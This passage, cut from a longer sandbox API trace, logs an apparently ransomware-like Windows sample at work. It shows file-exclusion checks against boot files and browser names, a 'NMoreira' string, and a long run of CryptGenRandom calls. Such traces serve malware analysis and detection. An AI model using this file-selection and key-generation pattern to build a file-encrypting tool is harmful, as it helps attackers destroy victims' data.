pszSpec="*MSDOS.SYS*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.449] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.449] strlen (_Str="NMoreira") returned 0x8 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 